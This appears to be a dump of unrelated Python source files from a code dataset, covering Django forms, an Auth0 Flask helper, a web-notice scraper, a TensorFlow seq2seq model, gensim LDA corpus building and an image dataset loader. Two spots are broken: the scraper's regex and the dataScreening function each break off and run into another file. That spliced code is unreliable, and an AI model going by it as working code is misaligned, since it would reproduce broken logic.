{"seq_id":"396963837","text":"from django.contrib.admin.widgets import FilteredSelectMultiple\nfrom django.contrib.auth.models import Group\nfrom django.forms import ModelMultipleChoiceField, ModelForm\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom apps.evaluations.models import Survey, Question\n\n\nclass QuestionForm(ModelForm):\n\n    class Meta:\n        model = Question\n        fields = (\n            'survey', 'question', 'question_fr', 'question_nl'\n        )\n\n\nclass AddGroupSurveyForm(ModelForm):\n    groups = ModelMultipleChoiceField(\n        label=_('Survey'), queryset=Group.objects.all(), widget=FilteredSelectMultiple('Group', is_stacked=True),\n        required=False\n    )\n\n    def __init__(self, *args, **kwargs):\n        instance = kwargs.get('instance')\n        if instance:\n            initial = kwargs.setdefault('initial', {})\n            initial['groups'] = [group.pk for group in instance.groups.all()]\n        super().__init__(*args, **kwargs)\n\n    class Meta:\n        model = Survey\n        fields = (\n            'name_en', 'name_fr', 'name_nl', 'groups'\n        )\n\n    def save(self, commit=True):\n        instance = super().save(False)\n        _save_m2m = self.save_m2m\n\n        def save_m2m():\n            _save_m2m()\n            instance.groups.clear()\n            instance.groups.add(*self.cleaned_data['groups'])\n        self.save_m2m = save_m2m\n        if commit:\n            
instance.save()\n self.save_m2m()\n return instance\n","sub_path":"lifeline-backend-master/apps/evaluations/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"552806935","text":"\"\"\"\nApplication Extension API\n\"\"\"\n\nimport os\nimport sys\nimport fnmatch\nimport platform\n\nimport zope\nimport p6.api\n\nclass ExtensionPrefField(object):\n def __init__(self, id, type, label, value=None):\n self.id = id\n self.type = type\n self.label = label\n\n self.value = value\n \nclass ExtensionPrefs(object):\n def __init__(self, id, label, fields={}):\n self.id = id\n self.label = label\n\n self.fields = fields\n \ndef extPaths():\n \"\"\"Return a list of paths to search for extensions and plugins.\"\"\"\n\n return [os.path.join(os.path.abspath('.'), 'extensions'),\n os.path.join(p6.api.getSupportDir(), 'extensions')\n ]\n\ndef extConfs(path):\n \"\"\"Generates a list of configuration files in the specified path;\n searches path and all subfolders for 'extension.zcml'.\"\"\"\n \n for (path, dirnames, filenames) in os.walk(path):\n for f in fnmatch.filter(filenames, 'extension.zcml'):\n yield os.path.join(path, f)\n\ndef loadExtension(extzcml, context):\n \"\"\"Loads the extension specified by [extzcml] -- modifies the Python\n Path to include the folder containing [extzcml].\"\"\"\n\n sys.path.insert(0, os.path.dirname(extzcml))\n zope.configuration.xmlconfig.file(extzcml, context=context)\n","sub_path":"publisher/tags/ccpublisher-2.0.3/p6/app/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"559838020","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.15-x86_64/egg/foxylib/tools/auth/auth0/auth0_tool.py\n# Compiled at: 2020-01-21 01:42:50\n# Size of source mod 2**32: 3074 bytes\nfrom functools import wraps\nfrom authlib.flask.client import OAuth\nfrom six.moves.urllib.parse import urlencode\nfrom flask import session, redirect\n\nclass Auth0Tool:\n\n class Config:\n CLIENT_ID = 'client_id'\n CLIENT_SECRET = 'client_secret'\n API_BASE_URL = 'api_base_url'\n SCOPE = 'scope'\n\n @classmethod\n def j_config2client_id(cls, j_config):\n return j_config[cls.Config.CLIENT_ID]\n\n @classmethod\n def j_config2client_secret(cls, j_config):\n return j_config[cls.Config.CLIENT_SECRET]\n\n @classmethod\n def j_config2api_base_url(cls, j_config):\n return j_config[cls.Config.API_BASE_URL]\n\n @classmethod\n def j_config2scope(cls, j_config):\n return j_config[cls.Config.SCOPE]\n\n @classmethod\n def app_config2auth0(cls, app, j_config):\n oauth = OAuth(app)\n base_url = cls.j_config2api_base_url(j_config)\n scope = cls.j_config2scope(j_config)\n access_token_url = '{}/oauth/token'.format(base_url)\n authorize_url = '{}/authorize'.format(base_url)\n auth0 = oauth.register('auth0',\n client_id=(cls.j_config2client_id(j_config)),\n client_secret=(cls.j_config2client_secret(j_config)),\n api_base_url=base_url,\n access_token_url=access_token_url,\n authorize_url=authorize_url,\n client_kwargs={'scope': scope})\n return auth0\n\n @classmethod\n def auth0_url2callback(cls, auth0, url_redirect):\n auth0.authorize_access_token()\n resp = auth0.get('userinfo')\n userinfo = resp.json()\n session['jwt_payload'] = 
userinfo\n        session['profile'] = {'user_id':userinfo['sub'],\n         'name':userinfo['name'],\n         'picture':userinfo['picture']}\n        return redirect(url_redirect)\n\n    @classmethod\n    def auth0_callback_url2login(cls, auth0, callback_url):\n        return auth0.authorize_redirect(redirect_uri=callback_url)\n\n    @classmethod\n    def requires_auth(cls, func=None, login_url=None):\n        if login_url is None:\n            login_url = '/'\n\n        def wrapper(f):\n\n            @wraps(f)\n            def wrapped(*_, **__):\n                if 'profile' not in session:\n                    return redirect(login_url)\n                return f(*_, **__)\n\n            return wrapped\n\n        if func:\n            return wrapper(func)\n        return wrapper","sub_path":"pycfiles/foxylib-0.3.96-py3.7/auth0_tool.cpython-37.py","file_name":"auth0_tool.cpython-37.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
{"seq_id":"58235133","text":"import re\n\nfrom requests import *\n\n\nclass Detector:\n\n    def __init__(self):\n        pass\n\n    def isNewNotification(self, location):  # checks whether the regional Military Manpower Administration URL passed in has a new notice\n        page = post(location).text\n        result = self.regex(page)\n        if result:  # if there is a new post\n            return result  # return the json holding the new post's details\n        else:\n            return 'no new notification'\n\n\n    def regex(self, string):  # use a regular expression to check for a new notice\n        pat = self.getPattern()\n        result = re.search(pat, string, flags=re.DOTALL)\n        json = self.parse(result)\n        if json is False:\n            return False\n        return json\n\n    def parse(self, data):\n        if data is None:\n            return False\n        id_num = data.group(1)\n        print('글 번호:', end=' ')  # 'post number:'\n        print(id_num)\n        title = data.group(3)\n        print('글 제목:', end=' ')  # 'post title:'\n        print(title)\n\n        return {'id_num':id_num, 'title':title}\n\n    def getPattern(self):\n        # ([0-9]{1,3}) is the post number; capture group 1\n        # (.*) matches all of the text in between\n        #([0-9]{1,3})(.*)>(.*)
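# ---------------------------------------------------------------------------
# Editor's sketch (not part of the original file): the Detector's actual
# pattern string was lost when this page was extracted (the `<...>` markup it
# matched against was stripped), so here is the same polling pattern with a
# purely illustrative placeholder regex -- group(1) carries the post id and
# group(3) the title, exactly as Detector.parse() expects.
import re
import requests

PATTERN = r'data-id="([0-9]{1,3})"(.*?)title="(.*?)"'  # placeholder, not the original pattern

def check_for_new_post(url):
    page = requests.post(url).text
    match = re.search(PATTERN, page, flags=re.DOTALL)
    if match is None:
        return None
    return {'id_num': match.group(1), 'title': match.group(3)}
# ---------------------------------------------------------------------------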
 \"python -m myfile\"\n\"\"\"\nWhen you use python -m xxx, xxx.py is loaded as a module (its __package__ is set, not None, just as if it had been imported),\nthen run as the top-level script.\nThe directory containing xxx.py will NOT be added as the first entry [0] of sys.path.\n\nThere are two ways to load a py file: as the top-level script, or as a module. The former means running the script directly,\ne.g. python myfile.py. If you run python -m myfile, or load the file from another py file with an import statement, it is\ntreated as a module. There is exactly one top-level script: the one that was executed first (e.g. the myfile.py in python myfile.py).\n\nWhen a py file is loaded, it is given a name, stored in its __name__ attribute. For the top-level script that name is __main__;\nfor a module, it is the file name joined to its packages/subpackages with '.'.\n\n====> whether an import succeeds depends on:\n1) where you type 'python abcxyz'\n2) how you run 'abcxyz' (-m, -c, etc)\n\"\"\"\n\n# Fibonacci numbers module\n\ndef fib(n):    # write Fibonacci series up to n\n    print(\"name: \", __name__)\n    # in interactive mode, import test_name as fibo, then fibo.fib(1): name is 'test_name'\n    # (just type fibo.__name__)\n    # in a terminal, python [-m] test_name.py 3: it is '__main__'\n    a, b = 0, 1\n    while b < n:\n        #print(b, end=\" \")\n        print(b, \" \")\n        a, b = b, a+b\n    print()\n\ndef fib2(n):   # return Fibonacci series up to n\n    print(\"this is fib2 in test_name.\")\n    print(\"name: \", __name__)\n    print(\"__package__: \", __package__)\n    result = []\n    a, b = 0, 1\n    while b < n:\n        result.append(b)\n        a, b = b, a+b\n    return result\n\n\"\"\"\n\nLingLins-MacBook-Pro:test linglin$ python3\nPython 3.6.2 (default, Jul 17 2017, 16:44:45) \n[GCC 4.2.1 Compatible Apple LLVM 8.1.0 (clang-802.0.42)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import test_name\n>>> fibo.fibo()\nTraceback (most recent call last):\n  File \"<stdin>\", line 1, in <module>\nNameError: name 'fibo' is not defined\n>>> fibo.fib(3)\nTraceback (most recent call last):\n  File \"<stdin>\", line 1, in <module>\nNameError: name 'fibo' is not defined\n>>> fib(3)\nTraceback (most recent call last):\n  File \"<stdin>\", line 1, in <module>\nNameError: name 'fib' is not defined\n>>> test_name.fib(3)\n1 1 2 \n>>> import test_name as fibo\n>>> fibo.fib(3)\n1 1 2 \n>>> fibo.__name__\n'test_name'\n>>> fibo.fib(2)\nname: test_name\n1 1 \n>>> fibo.__package__\n''\n>>> \n\n\n\"\"\"\n\n\nif __name__ == \"__main__\":\n    import sys\n    fib2(int(sys.argv[1]))\n    print(sys.path[0], sys.path)\n    print(\"argv[0]: \", sys.argv[0])\n\n\"\"\"\n6.1.1. Executing modules as scripts\nWhen you run a Python module with\n\npython fibo.py <arguments>\nthe code in the module will be executed, just as if you imported it, but with the __name__ set to \"__main__\". 
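# ---------------------------------------------------------------------------
# Editor's sketch (not from the original file): a one-file probe that makes
# the loading rules above visible. Save it as probe.py (name is illustrative)
# and compare `python probe.py`, `python -m probe`, and `>>> import probe`.
import sys

print('__name__    =', __name__)      # '__main__' as a script or under -m; 'probe' when imported
print('__package__ =', __package__)   # None for `python probe.py`, '' for `python -m probe`
print('sys.path[0] =', sys.path[0])   # the script's directory vs. the current dir under -m
# ---------------------------------------------------------------------------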
\nThat means that by adding this code at the end of your module:\n\n\nif __name__ == \"__main__\":\n import sys\n fib(int(sys.argv[1]))\n \nyou can make the file usable as a script as well as an importable module, because the code that parses the command line \nonly runs if the module is executed as the “main” file:\n\n\"\"\"\n\n\n\n\"\"\"\nLingLins-MacBook-Pro:testhello linglin$ python3 -m test.test_name 3\nthis is fib2 in test_name.\nname: __main__\n__package__: test\n ['', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python36.zip', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python3.6', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/site-packages']\nargv[0]: /Users/linglin/PycharmProjects/testhello/test/test_name.py\n\n================\n\nLingLins-MacBook-Pro:testhello linglin$ python3 test/test_name.py 3\nthis is fib2 in test_name.\nname: __main__\n__package__: None\n/Users/linglin/PycharmProjects/testhello/test ['/Users/linglin/PycharmProjects/testhello/test', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python36.zip', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python3.6', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/site-packages']\nargv[0]: test/test_name.py\n\n=======================\n\nLingLins-MacBook-Pro:testhello linglin$ cd test\nLingLins-MacBook-Pro:test linglin$ python3 test_name.py 3\nthis is fib2 in test_name.\nname: __main__\n__package__: None\n/Users/linglin/PycharmProjects/testhello/test ['/Users/linglin/PycharmProjects/testhello/test', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python36.zip', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python3.6', '/usr/local/Cellar/python3/3.6.2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/site-packages']\nargv[0]: test_name.py\nLingLins-MacBook-Pro:test linglin$ \n\n=======================\n\nLingLins-MacBook-Pro:test linglin$ python3 -m test_name.py 3\n/usr/local/opt/python3/bin/python3.6: Error while finding module specification for 'test_name.py' (AttributeError: module 'test_name' has no attribute '__path__')\n\nLingLins-MacBook-Pro:test linglin$ python3 -m .test_name.py 3\n/usr/local/opt/python3/bin/python3.6: Relative module names not supported\n\nLingLins-MacBook-Pro:test linglin$ python3 -m test_name 3\nthis is fib2 in test_name.\nname: __main__\n__package__: \n ['', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python36.zip', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/site-packages']\nargv[0]: /Users/linglin/PycharmProjects/testhello/test/test_name.py\n\n=======================\n\nLingLins-MacBook-Pro:testhello linglin$ cd ..\nLingLins-MacBook-Pro:PycharmProjects linglin$ python3 testhello//test/test_name.py 3\nthis is fib2 in test_name.\nname: __main__\n__package__: None\n/Users/linglin/PycharmProjects/testhello/test ['/Users/linglin/PycharmProjects/testhello/test', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python36.zip', 
'/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/site-packages']\nargv[0]: testhello//test/test_name.py\nLingLins-MacBook-Pro:PycharmProjects linglin$ \n\n\nLingLins-MacBook-Pro:PycharmProjects linglin$ python3 -m testhello.test.test_name 3\nthis is fib2 in test_name.\nname: __main__\n__package__: testhello.test\n ['', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python36.zip', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/site-packages']\nargv[0]: /Users/linglin/PycharmProjects/testhello/test/test_name.py\n\n\nLingLins-MacBook-Pro:PycharmProjects linglin$ cd ..\nLingLins-MacBook-Pro:~ linglin$ python3 -m PycharmProjects.testhello.test.test_name 3\nthis is fib2 in test_name.\nname: __main__\n__package__: PycharmProjects.testhello.test\n ['', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python36.zip', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6', '/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/site-packages']\nargv[0]: /Users/linglin/PycharmProjects/testhello/test/test_name.py\n\n\n\"\"\"","sub_path":"test/test_name.py","file_name":"test_name.py","file_ext":"py","file_size_in_byte":8277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"267644216","text":"##!/usr/bin/python3\n\"\"\"\n Author: hejingwen\n Purpose: Function Example\n Created: 4/16/2020\n\"\"\"\nimport random\nimport string\n\ndef dataSampling(datatype, datarange, num, strlen=6): # 固定参数;可变参数arg*;默认参数;关键字参数**kwargs\n '''\n :Description: function...\n :param datatype: input the type of data\n :param datarange: input the range of data, a iterable data object\n :param num: the number of data\n :return: a set of sampling data\n '''\n try:\n result = set()\n for index in range(1, num):# while(result.account == num)\n if datatype is int:\n it = iter(datarange)\n item = random.randint(next(it), next(it))\n result.add(item)\n continue\n elif datatype is float:\n result.add(random.uniform(1, 10))\n continue\n elif datatype is str:\n item = ''.join(random.SystemRandom().choice(datarange) for _ in range(strlen))\n result.add(item)\n continue\n else:\n pass\n except:\n if type(datatype) is int and type(datarange) is tuple:\n print()\n elif type(datatype) is str and type(datarange) is str:\n print()\n else:\n print(\"数据类型或者数据范围出错\")\n\n\n finally:\n return result\n\ndef dataScreening(dataset, condition):\n try:\n for i in dataset:\n if type(i) is int:\n if i>condition[0] and i 0 :\r\n a = CardAuthor()\r\n a.card = newq\r\n a.author = request.user\r\n a.save()\r\n\r\n return question_id\r\n \r\ndef cards_by_user(user, count=10) :\r\n '''Return a queryset of Card object made by a user'''\r\n authored_cards = Card.objects.filter(cardauthor__author=user).order_by('-id')\r\n return authored_cards\r\n\r\n \r\n\r\n","sub_path":"deck/deck_util.py","file_name":"deck_util.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"442258407","text":"import tensorflow as 
tf\nimport pdb\nimport numpy as np\n\nclass Seq2Seq:\n\n    logits = None\n    outputs = None\n    cost = None\n    train_op = None\n\n    def __init__(self, vocab_size, n_hidden=128, n_layers=3, output_keep_prob=0.75):\n        self.learning_rate = 0.001\n\n        self.vocab_size = vocab_size\n        self.n_hidden = n_hidden\n        self.n_layers = n_layers\n\n        self.enc_input = tf.placeholder(tf.float32, [None, None, self.vocab_size])\n        self.enc_input_reverse = tf.placeholder(tf.float32, [None, None, self.vocab_size])\n        self.dec_input = tf.placeholder(tf.float32, [None, None, self.vocab_size])\n        self.targets = tf.placeholder(tf.int64, [None, None])\n\n        self.weights = tf.Variable(tf.ones([self.n_hidden, self.vocab_size]), name=\"weights\")\n        self.bias = tf.Variable(tf.zeros([self.vocab_size]), name=\"bias\")\n        self.global_step = tf.Variable(0, trainable=False, name=\"global_step\")\n\n        self._build_model(output_keep_prob)\n\n        self.saver = tf.train.Saver(tf.global_variables())\n\n    def _build_model(self, output_keep_prob):\n        # self.enc_input = tf.transpose(self.enc_input, [1, 0, 2])\n        # self.dec_input = tf.transpose(self.dec_input, [1, 0, 2])\n\n        enc_cell, dec_cell = self._build_cells(output_keep_prob)\n        enc_cell = Wrapper(enc_cell)\n\n        with tf.variable_scope('encode_forward'):\n            enc_forward_outputs, enc_states_forward_final = tf.nn.dynamic_rnn(enc_cell, self.enc_input, dtype=tf.float32)\n\n        with tf.variable_scope('encode_backward'):\n            enc_backward_outputs, enc_states_backward_final = tf.nn.dynamic_rnn(enc_cell, self.enc_input_reverse, dtype=tf.float32)\n\n        enc_states = []\n        enc_states_forward = enc_forward_outputs[0]\n        enc_states_backward = enc_backward_outputs[0]\n\n        # concatenate the per-step forward and backward LSTM states\n        for i, item in enumerate(enc_states_forward):\n            enc_states.append(tf.contrib.rnn.LSTMStateTuple(tf.concat((item[0], enc_states_backward[i][0]), axis=2),\n                                                            tf.concat((item[1], enc_states_backward[i][1]), axis=2)))\n\n        ################################################################################################################\n\n        # Exercise: choose the value of the context vector that is fed into the decoder first\n\n        with tf.variable_scope('decode'):\n            outputs, dec_states = tf.nn.dynamic_rnn(dec_cell, self.dec_input, dtype=tf.float32,\n                                                    initial_state=enc_states_forward_final)\n\n        ################################################################################################################\n\n        self.logits, self.cost, self.train_op = self._build_ops(outputs, self.targets)\n\n        self.outputs = tf.argmax(self.logits, 2)\n\n    def _cell(self, output_keep_prob, n_hidden):\n        rnn_cell = tf.nn.rnn_cell.LSTMCell(n_hidden)\n        rnn_cell = tf.nn.rnn_cell.DropoutWrapper(rnn_cell, output_keep_prob=output_keep_prob)\n        return rnn_cell\n\n    def _build_cells(self, output_keep_prob=0.75):\n        # stack self.n_layers dropout-wrapped LSTM cells into a deep RNN for the encoder\n        # (_cell wraps a single LSTM cell)\n        enc_cell = tf.nn.rnn_cell.MultiRNNCell([self._cell(output_keep_prob, self.n_hidden)\n                                                for _ in range(self.n_layers)])\n        # same depth for the decoder\n        dec_cell = tf.nn.rnn_cell.MultiRNNCell([self._cell(output_keep_prob, self.n_hidden)\n                                                for _ in range(self.n_layers)])\n\n        return enc_cell, dec_cell\n\n    def _build_ops(self, outputs, targets):\n        time_steps = tf.shape(outputs)[1]\n        outputs = tf.reshape(outputs, [-1, self.n_hidden])\n\n        logits = tf.matmul(outputs, self.weights) + self.bias\n        logits = tf.reshape(logits, [-1, time_steps, self.vocab_size])\n\n        cost = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=targets))\n        train_op = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(cost, 
global_step=self.global_step)\n\n tf.summary.scalar('cost', cost)\n\n return logits, cost, train_op\n\n def train(self, session, enc_forward_input,enc_reverse_input, dec_input, targets):\n\n enc_input_reverse=[np.flip(i,axis=0) for i in enc_reverse_input]\n return session.run([self.train_op, self.cost],\n feed_dict={self.enc_input: enc_forward_input,\n self.dec_input: dec_input,\n self.enc_input_reverse: enc_input_reverse,\n self.targets: targets})\n\n def test(self, session, enc_forward_input, enc_input_reverse, dec_input, targets):\n enc_input_reverse=[np.flip(i,axis=0) for i in enc_input_reverse]\n\n\n prediction_check = tf.equal(self.outputs, self.targets)\n accuracy = tf.reduce_mean(tf.cast(prediction_check, tf.float32))\n\n return session.run([self.targets, self.outputs, accuracy],\n feed_dict={self.enc_input: enc_forward_input,\n self.enc_input_reverse: enc_input_reverse,\n self.dec_input: dec_input,\n self.targets: targets})\n\n def predict(self, session, enc_forward_input, enc_reverse_input, dec_input):\n\n enc_input_reverse=[np.flip(i,axis=0) for i in enc_reverse_input]\n return session.run(self.outputs,\n feed_dict={self.enc_input: enc_forward_input,\n self.enc_input_reverse: enc_input_reverse,\n self.dec_input: dec_input})\n\n def write_logs(self, session, writer, enc_input, dec_input, targets):\n merged = tf.summary.merge_all()\n\n summary = session.run(merged, feed_dict={self.enc_input: enc_input,\n self.dec_input: dec_input,\n self.targets: targets})\n\n writer.add_summary(summary, self.global_step.eval())\n\n\nclass Wrapper(tf.nn.rnn_cell.RNNCell):\n def __init__(self, inner_cell):\n super(Wrapper, self).__init__()\n self._inner_cell = inner_cell\n\n @property\n def state_size(self):\n return self._inner_cell.state_size\n\n @property\n def output_size(self):\n return (self._inner_cell.state_size, self._inner_cell.output_size)\n\n def call(self, input, *args, **kwargs):\n output, next_state = self._inner_cell(input, *args, **kwargs)\n emit_output = (next_state, output)\n return emit_output, next_state\n","sub_path":"Chatbot_RNN/model_sen.py","file_name":"model_sen.py","file_ext":"py","file_size_in_byte":6731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"294182315","text":"import argparse\nimport os\nimport logging\nimport datetime\nimport itertools\nfrom gensim import corpora, models\n\n\n# Input arguments\nPROGRAM_DESCRIPTION = \"Read TV show tweets and analyse\"\nparser = argparse.ArgumentParser(description=PROGRAM_DESCRIPTION)\nparser.add_argument('prefix', type=str, help='Prefix of input files')\nparser.add_argument('directory', type=str, help='Directory tv show')\nparser.add_argument('output', type=str, help='Directory tv show')\nargs = vars(parser.parse_args())\n\ndef main():\n collection_name = args['prefix']\n dir_name = args['directory']\n output_dir = args['output']\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n\n filename = dir_name + \"/\" + collection_name +\"_text.csv\"\n output_file= output_dir + \"/\" + collection_name +\"_text.csv\"\n\n\n log_file = output_dir + '/' + collection_name + \"lda_log.log\"\n logging.basicConfig(filename=log_file, level=logging.DEBUG, format='%(asctime)s %(message)s')\n logging.debug(\"reading users fof topic modelling: {0} for hashtags : {1}\".format(datetime.date.today(), collection_name))\n\n doc_gen = read_file_into_generator(filename)\n create_corpus(doc_gen, filename, output_file)\n\n\ndef create_corpus(doc_gen, filename, output_file):\n documents1, 
documents2 = itertools.tee(doc_gen) # clone the generator\n # create a Gensim dictionary from documents\n dictionary = corpora.Dictionary(documents1)\n logging.debug(\"dictionary length {0}\".format(len(dictionary)))\n # filter extremes\n dictionary.filter_extremes(no_below=1, no_above=0.5)\n logging.debug(\"dictionary length after extreme removal {0}\".format(len(dictionary)))\n dictionary.save(output_file + '.dict')\n\n # convert the dictionary to a corpus\n corpus = [dictionary.doc2bow(doc) for doc in documents2]\n corpora.MmCorpus.serialize(output_file + '_corpus.mm', corpus)\n logging.debug(\"corpus written !!\")\n\ndef read_file_into_generator(filename):\n print(\"reading {}\".format(filename))\n with open(filename, 'r') as r:\n count = 0\n for line in r:\n count += 1\n if count % 1000 == 0:\n logging.debug(\"users done {0}\".format(count))\n yield line.split()\n\n\nif __name__ ==\"__main__\":\n main()","sub_path":"gLDA/lda_gensim_make_corpus.py","file_name":"lda_gensim_make_corpus.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"143479746","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Ming JIN\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport numpy\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import random_seed\nfrom PIL import Image\nimport fileUtil as file\nfrom labelFile2Map import *\nimport base\nimport cv2\nimport random\n\ndef read_data_sets(data_dir,\n one_hot=True,\n dtype=dtypes.float32,\n reshape=True,\n validation_size=0, #no validation needed\n seed=None):\n\n TRAIN = os.path.join(data_dir, \"train\", \"train.txt\")\n TEST = os.path.join(data_dir, \"test\", \"test.txt\")\n\n train_images, train_labels = process_images(TRAIN, one_hot=one_hot)\n test_images, test_labels = process_images(TEST, one_hot=one_hot)\n\n validation_images = train_images[:validation_size]\n validation_labels = train_labels[:validation_size]\n train_images = train_images[validation_size:]\n train_labels = train_labels[validation_size:]\n \n cut = numpy.empty((128,24,24,3))\n cut_test = numpy.empty((1280,24,24,3))\n \n new_part_cut = numpy.empty((128,24,24,3))\n new_part_cut_test = numpy.empty((1280,24,24,3))\n rest_part_cut = numpy.empty((128,24,24,3))\n rest_part_cut_test = numpy.empty((1280,24,24,3))\n \n train = DataSet(train_images, train_labels, cut, cut_test, new_part_cut, rest_part_cut, new_part_cut_test, rest_part_cut_test, dtype=dtype, reshape=reshape, seed=seed)\n validation = DataSet(validation_images,validation_labels,cut,cut_test, new_part_cut, rest_part_cut, new_part_cut_test, rest_part_cut_test, dtype=dtype,reshape=reshape,seed=seed)\n test = DataSet(test_images, test_labels, cut, cut_test, new_part_cut, rest_part_cut, new_part_cut_test, rest_part_cut_test, dtype=dtype, reshape=reshape, seed=seed)\n\n return base.Datasets(train=train, validation=validation, test=test)\n\n\ndef process_images(label_file, one_hot, num_classes=10):\n if file.getFileName(label_file) == 'train.txt':\n images = numpy.empty((50000, 3072)) \n labels = numpy.empty(50000)\n if file.getFileName(label_file) == 'test.txt':\n images = numpy.empty((10000, 3072))\n labels = numpy.empty(10000)\n lines = readLines(label_file)\n label_record = map(lines)\n file_name_length = len(file.getFileName(label_file))\n image_dir = label_file[:-1*file_name_length]\n print(len(label_record))\n index 
= 0\n for name in label_record:\n image = Image.open(image_dir + str(label_record[name]) + '/' + name)\n if index % 100 == 0:\n print(\"processing %d: \" % index + image_dir + str(label_record[name]) + '/' + name)\n\n img_ndarray = numpy.asarray(image, dtype='float32')\n images[index] = numpy.ndarray.flatten(img_ndarray)\n labels[index] = numpy.int(label_record[name])\n\n index = index + 1\n print(\"done: %d\" % index)\n num_images = index\n rows = 32\n cols = 32\n \n if one_hot:\n return images.reshape(num_images, rows, cols, 3), dense_to_one_hot(numpy.array(labels, dtype=numpy.uint8), num_classes)\n \n return images.reshape(num_images, rows, cols, 3), numpy.array(labels, dtype=numpy.uint8)\n\n\ndef dense_to_one_hot(labels_dense, num_classes):\n \"\"\"Convert class labels from scalars to one-hot vectors.\"\"\"\n num_labels = labels_dense.shape[0]\n index_offset = numpy.arange(num_labels) * num_classes\n labels_one_hot = numpy.zeros((num_labels, num_classes))\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\n return labels_one_hot\n\n\nclass DataSet(object):\n def __init__(self,\n images,\n labels,\n cut_images,\n cut_test_images,\n images_new_part_cut,\n images_rest_part_cut,\n images_new_part_cut_test,\n images_rest_part_cut_test,\n fake_data=False,\n one_hot=False,\n dtype=dtypes.float32,\n reshape=False,\n seed=None):\n \"\"\"Construct a DataSet.\n one_hot arg is used only if fake_data is true. `dtype` can be either\n `uint8` to leave the input as `[0, 255]`, or `float32` to rescale into\n `[0, 1]`. Seed arg provides for convenient deterministic testing.\n \"\"\"\n seed1, seed2 = random_seed.get_seed(seed)\n # If op level seed is not set, use whatever graph level seed is returned\n numpy.random.seed(seed1 if seed is None else seed2)\n dtype = dtypes.as_dtype(dtype).base_dtype\n \n if dtype not in (dtypes.uint8, dtypes.float32):\n raise TypeError('Invalid image dtype %r, expected uint8 or float32' %\n dtype)\n if fake_data:\n \n self._num_examples = 10000\n self.one_hot = one_hot\n \n else:\n \n assert images.shape[0] == labels.shape[0], ('images.shape: %s labels.shape: %s' % (images.shape, labels.shape))\n self._num_examples = images.shape[0]\n\n if reshape:\n assert images.shape[3] == 3\n images = images.reshape(images.shape[0], images.shape[1], images.shape[2], images.shape[3])\n \n if dtype == dtypes.float32:\n images = images.astype(numpy.float32)\n images = numpy.multiply(images, 1.0 / 255.0)\n \n self._images = images\n self._labels = labels\n self._epochs_completed = 0\n self._index_in_epoch = 0\n \n self._cut_images = cut_images\n self._cut_test_images = cut_test_images\n self._images_new_part_cut = images_new_part_cut\n self._images_rest_part_cut = images_rest_part_cut\n self._images_new_part_cut_test = images_new_part_cut_test\n self._images_rest_part_cut_test = images_rest_part_cut_test \n \n 